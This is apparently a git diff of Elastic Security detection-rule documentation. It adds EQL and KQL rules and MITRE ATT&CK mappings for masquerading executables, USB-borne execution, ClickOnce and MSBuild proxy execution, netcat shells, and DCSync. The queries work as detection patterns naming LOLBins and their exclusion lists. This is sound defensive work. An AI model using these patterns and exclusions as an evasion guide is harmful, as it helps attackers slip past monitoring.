b/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-find.asciidoc @@ -31,7 +31,7 @@ Identifies instances where the 'find' command is started on a Linux system with * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-grep.asciidoc b/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-grep.asciidoc index 8f93d85973..ea6a6cb59b 100644 --- a/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-grep.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-grep.asciidoc @@ -31,7 +31,7 @@ Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is starte * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/esxi-timestomping-using-touch-command.asciidoc b/docs/detections/prebuilt-rules/rule-details/esxi-timestomping-using-touch-command.asciidoc index fcd87fb5eb..4296da6f93 100644 --- a/docs/detections/prebuilt-rules/rule-details/esxi-timestomping-using-touch-command.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/esxi-timestomping-using-touch-command.asciidoc @@ -31,7 +31,7 @@ Identifies instances where the 'touch' command is executed on a Linux system wit * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/exchange-mailbox-export-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/exchange-mailbox-export-via-powershell.asciidoc index 36e540e415..72dad3ea3e 100644 --- a/docs/detections/prebuilt-rules/rule-details/exchange-mailbox-export-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/exchange-mailbox-export-via-powershell.asciidoc @@ -35,7 +35,7 @@ Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -111,6 +111,10 @@ event.category:process and host.os.type:windows and ** ID: TA0009 ** Reference URL: https://attack.mitre.org/tactics/TA0009/ * Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ +* Technique: ** Name: Email Collection ** ID: T1114 ** Reference URL: https://attack.mitre.org/techniques/T1114/ diff --git a/docs/detections/prebuilt-rules/rule-details/executable-file-with-unusual-extension.asciidoc b/docs/detections/prebuilt-rules/rule-details/executable-file-with-unusual-extension.asciidoc new file mode 100644 index 0000000000..674dc4eaab --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/executable-file-with-unusual-extension.asciidoc @@ -0,0 +1,80 @@ +[[executable-file-with-unusual-extension]] +=== Executable File with Unusual Extension + +Identifies the creation or modification of an executable file with an unexpected file extension. Attackers may attempt to evade detection by masquerading files using the file extension values used by image, audio, or document file types. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.action != "deletion" and + + /* MZ header or its common base64 equivalent TVqQ */ + file.Ext.header_bytes : ("4d5a*", "54567151*") and + + ( + /* common image file extensions */ + file.extension : ("jpg", "jpeg", "emf", "tiff", "gif", "png", "bmp", "fpx", "eps", "svg", "inf") or + + /* common audio and video file extensions */ + file.extension : ("mp3", "wav", "avi", "mpeg", "flv", "wma", "wmv", "mov", "mp4", "3gp") or + + /* common document file extensions */ + file.extension : ("txt", "pdf", "doc", "docx", "rtf", "ppt", "pptx", "xls", "xlsx", "hwp", "html") + ) and + not process.pid == 4 and + not process.executable : "?:\\Program Files (x86)\\Trend Micro\\Client Server Security Agent\\Ntrtscan.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade File Type +** ID: T1036.008 +** Reference URL: https://attack.mitre.org/techniques/T1036/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-from-a-removable-media-with-network-connection.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-from-a-removable-media-with-network-connection.asciidoc new file mode 100644 index 0000000000..0e11fc74b6 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/execution-from-a-removable-media-with-network-connection.asciidoc @@ -0,0 +1,68 @@ +[[execution-from-a-removable-media-with-network-connection]] +=== Execution from a Removable Media with Network Connection + +Identifies process execution from a removable media and by an unusual process. Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=5m + [process where host.os.type == "windows" and event.action == "start" and + + /* Direct Exec from USB */ + (process.Ext.device.bus_type : "usb" or process.Ext.device.product_id : "USB *") and + (process.code_signature.trusted == false or process.code_signature.exists == false) and + + not process.code_signature.status : ("errorExpired", "errorCode_endpoint*")] + [network where host.os.type == "windows" and event.action == "connection_attempted"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Replication Through Removable Media +** ID: T1091 +** Reference URL: https://attack.mitre.org/techniques/T1091/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-of-an-unsigned-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-of-an-unsigned-service.asciidoc index 3cb015a738..397c3b3b16 100644 --- a/docs/detections/prebuilt-rules/rule-details/execution-of-an-unsigned-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/execution-of-an-unsigned-service.asciidoc @@ -27,10 +27,11 @@ This rule identifies the execution of unsigned executables via service control m * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 102 +*Version*: 103 *Rule authors*: @@ -64,3 +65,15 @@ process.parent.executable:"C:\\Windows\\System32\\services.exe" and ** Name: Service Execution ** ID: T1569.002 ** Reference URL: https://attack.mitre.org/techniques/T1569/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc new file mode 100644 index 0000000000..e2f5906838 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc @@ -0,0 +1,71 @@ +[[execution-via-microsoft-dotnet-clickonce-host]] +=== Execution via Microsoft DotNet ClickOnce Host + +Identifies the execution of DotNet ClickOnce installer via Dfsvc.exe trampoline. Adversaries may take advantage of ClickOnce to proxy execution of malicious payloads via trusted Microsoft processes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by user.id with maxspan=5s + [process where host.os.type == "windows" and event.action == "start" and + process.name : "rundll32.exe" and process.command_line : ("*dfshim*ShOpenVerbApplication*", "*dfshim*#*")] + [network where host.os.type == "windows" and process.name : "dfsvc.exe"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc new file mode 100644 index 0000000000..dcce169af8 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc @@ -0,0 +1,108 @@ +[[execution-via-ms-visualstudio-pre-post-build-events]] +=== Execution via MS VisualStudio Pre/Post Build Events + +Identifies the execution of a command via Microsoft Visual Studio Pre or Post build events. Adversaries may backdoor a trusted visual studio project to execute a malicious command during the project build process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/visualstudio/ide/reference/pre-build-event-post-build-event-command-line-dialog-box?view=vs-2022 +* https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html +* https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ +* https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Execution/execution_evasion_visual_studio_prebuild_event.evtx + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [process where host.os.type == "windows" and event.action == "start" and + process.name : "cmd.exe" and process.parent.name : "MSBuild.exe" and + process.args : "?:\\Users\\*\\AppData\\Local\\Temp\\tmp*.exec.cmd"] by process.entity_id + [process where host.os.type == "windows" and event.action == "start" and + process.name : ( + "cmd.exe", "powershell.exe", + "MSHTA.EXE", "CertUtil.exe", + "CertReq.exe", "rundll32.exe", + "regsvr32.exe", "MSbuild.exe", + "cscript.exe", "wscript.exe", + "installutil.exe" + ) and + not + ( + process.name : ("cmd.exe", "powershell.exe") and + process.args : ( + "*\\vcpkg\\scripts\\buildsystems\\msbuild\\applocal.ps1", + "HKLM\\SOFTWARE\\Microsoft\\VisualStudio\\SxS\\VS?", + "process.versions.node*", + "?:\\Program Files\\nodejs\\node.exe", + "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSBuild\\ToolsVersions\\*", + "*Get-ChildItem*Tipasplus.css*", + "Build\\GenerateResourceScripts.ps1", + "Shared\\Common\\..\\..\\BuildTools\\ConfigBuilder.ps1\"", + "?:\\Projets\\*\\PostBuild\\MediaCache.ps1" + ) + ) and + not process.executable : "?:\\Program Files*\\Microsoft Visual Studio\\*\\MSBuild.exe" and + not (process.name : "cmd.exe" and + process.command_line : + ("*vswhere.exe -property catalog_productSemanticVersion*", + "*git log --pretty=format*", "*\\.nuget\\packages\\vswhere\\*", + "*Common\\..\\..\\BuildTools\\*")) + ] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc index 693af50fa9..0f2de613ad 100644 --- a/docs/detections/prebuilt-rules/rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc @@ -36,7 +36,7 @@ Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -126,3 +126,7 @@ process where host.os.type == "windows" and event.type == "start" and process.pa ** Name: Command and Scripting Interpreter ** ID: T1059 ** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-via-tsclient-mountpoint.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-via-tsclient-mountpoint.asciidoc index 66806b7a62..210b9d2b94 100644 --- a/docs/detections/prebuilt-rules/rule-details/execution-via-tsclient-mountpoint.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/execution-via-tsclient-mountpoint.asciidoc @@ -35,7 +35,7 @@ Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint ts * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -71,3 +71,7 @@ process where host.os.type == "windows" and event.type == "start" and process.ex ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/expired-or-revoked-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/expired-or-revoked-driver-loaded.asciidoc index 39b3a2582c..b83d90578b 100644 --- a/docs/detections/prebuilt-rules/rule-details/expired-or-revoked-driver-loaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/expired-or-revoked-driver-loaded.asciidoc @@ -29,10 +29,10 @@ Identifies an attempt to load a revoked or expired driver. Adversaries may bring * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation -* Rule Type: BBR +* Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -61,3 +61,15 @@ driver where host.os.type == "windows" and process.pid == 4 and ** Name: Exploitation for Privilege Escalation ** ID: T1068 ** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/exporting-exchange-mailbox-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/exporting-exchange-mailbox-via-powershell.asciidoc index b4d3de4fd7..7b1dd1bf35 100644 --- a/docs/detections/prebuilt-rules/rule-details/exporting-exchange-mailbox-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/exporting-exchange-mailbox-via-powershell.asciidoc @@ -33,11 +33,12 @@ Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, * OS: Windows * Use Case: Threat Detection * Tactic: Collection +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -122,3 +123,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Remote Email Collection ** ID: T1114.002 ** Reference URL: https://attack.mitre.org/techniques/T1114/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc index 4c37d880e8..6abd066825 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc @@ -29,7 +29,7 @@ This rule monitors for the creation of a file, followed by its execution and sel * Tactic: Execution * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/file-deletion-via-shred.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-deletion-via-shred.asciidoc index d21981beff..4c3f3cc176 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-deletion-via-shred.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-deletion-via-shred.asciidoc @@ -29,7 +29,7 @@ Malware or other files dropped or created on a system by an adversary may leave * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/file-made-immutable-by-chattr.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-made-immutable-by-chattr.asciidoc index 458898c20c..5437830991 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-made-immutable-by-chattr.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-made-immutable-by-chattr.asciidoc @@ -32,7 +32,7 @@ Detects a file being made immutable using the chattr binary. Making a file immut * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -41,47 +41,6 @@ Detects a file being made immutable using the chattr binary. Making a file immut *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. -- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/file-permission-modification-in-writable-directory.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-permission-modification-in-writable-directory.asciidoc index 8028c96f9c..7299d6bf25 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-permission-modification-in-writable-directory.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-permission-modification-in-writable-directory.asciidoc @@ -3,7 +3,7 @@ Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -30,7 +30,7 @@ Identifies file permission modifications in common writable directories by a non * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 105 +*Version*: 206 *Rule authors*: @@ -44,11 +44,9 @@ Identifies file permission modifications in common writable directories by a non [source, js] ---------------------------------- -process where host.os.type == "linux" and event.type == "start"and - process.name in ("chmod", "chown", "chattr", "chgrp") and - process.working_directory in ("/tmp", "/var/tmp", "/dev/shm") and - not process.parent.name in ("update-motd-updates-available") and - not user.name == "root" +host.os.type:linux and event.category:process and event.type:start and +process.name:(chmod or chown or chattr or chgrp) and +process.working_directory:("/tmp" or "/var/tmp" or "/dev/shm") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/file-staged-in-root-folder-of-recycle-bin.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-staged-in-root-folder-of-recycle-bin.asciidoc index fa5fbd5814..217eaa2134 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-staged-in-root-folder-of-recycle-bin.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-staged-in-root-folder-of-recycle-bin.asciidoc @@ -30,7 +30,7 @@ Identifies files written to the root of the Recycle Bin folder instead of subdir * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -61,3 +61,7 @@ file where host.os.type == "windows" and event.type == "creation" and ** Name: Data Staged ** ID: T1074 ** Reference URL: https://attack.mitre.org/techniques/T1074/ +* Sub-technique: +** Name: Local Data Staging +** ID: T1074.001 +** Reference URL: https://attack.mitre.org/techniques/T1074/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/file-transfer-or-listener-established-via-netcat.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-transfer-or-listener-established-via-netcat.asciidoc index 667212f249..77cc355342 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-transfer-or-listener-established-via-netcat.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-transfer-or-listener-established-via-netcat.asciidoc @@ -38,7 +38,7 @@ A netcat process is engaging in network activity on a Linux host. Netcat is ofte * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -90,6 +90,7 @@ This rule identifies potential reverse shell or bind shell activity using Netcat - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc b/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc index b7f2a673a1..bf58ea2539 100644 --- a/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc @@ -33,7 +33,7 @@ An adversary equipped with compromised credentials may attempt to access the sec * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 207 +*Version*: 308 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/first-time-seen-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/first-time-seen-driver-loaded.asciidoc index 3d4c83ac79..995a424d7f 100644 --- a/docs/detections/prebuilt-rules/rule-details/first-time-seen-driver-loaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/first-time-seen-driver-loaded.asciidoc @@ -28,11 +28,12 @@ Identifies the load of a driver with an original file name and signature values * Domain: Endpoint * OS: Windows * Use Case: Threat Detection +* Tactic: Privilege Escalation * Tactic: Persistence * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -121,6 +122,14 @@ event.category:"driver" and host.os.type:windows and event.action:"load" *Framework*: MITRE ATT&CK^TM^ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ * Tactic: ** Name: Persistence ** ID: TA0003 diff --git a/docs/detections/prebuilt-rules/rule-details/firsttime-seen-account-performing-dcsync.asciidoc b/docs/detections/prebuilt-rules/rule-details/firsttime-seen-account-performing-dcsync.asciidoc index 9c182700fd..acf0db1abf 100644 --- a/docs/detections/prebuilt-rules/rule-details/firsttime-seen-account-performing-dcsync.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/firsttime-seen-account-performing-dcsync.asciidoc @@ -36,11 +36,12 @@ This rule identifies when a User Account starts the Active Directory Replication * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Privilege Escalation * Use Case: Active Directory Monitoring * Data Source: Active Directory * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -119,3 +120,15 @@ event.action:"Directory Service Access" and event.code:"4662" and ** Name: DCSync ** ID: T1003.006 ** Reference URL: https://attack.mitre.org/techniques/T1003/006/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/halfbaked-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/rule-details/halfbaked-command-and-control-beacon.asciidoc index 75284f0122..f641f454b3 100644 --- a/docs/detections/prebuilt-rules/rule-details/halfbaked-command-and-control-beacon.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/halfbaked-command-and-control-beacon.asciidoc @@ -33,7 +33,7 @@ Halfbaked is a malware family used to establish persistence in a contested netwo * Tactic: Command and Control * Domain: Endpoint -*Version*: 103 +*Version*: 104 *Rule authors*: @@ -57,10 +57,10 @@ This activity has been observed in FIN7 campaigns. [source, js] ---------------------------------- -(event.dataset: (network_traffic.tls or network_traffic.http) or - (event.category: (network or network_traffic) and network.protocol: http)) and - network.transport:tcp and url.full:/http:\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}\/cd/ and - destination.port:(53 or 80 or 8080 or 443) +(event.dataset: (network_traffic.tls OR network_traffic.http) OR + (event.category: (network OR network_traffic) AND network.protocol: http)) AND + network.transport:tcp AND url.full:/http:\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}\/cd/ AND + destination.port:(53 OR 80 OR 8080 OR 443) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-user-password-reset-or-unlock-attempts.asciidoc b/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-user-password-reset-or-unlock-attempts.asciidoc index da219ac91d..0326af8398 100644 --- 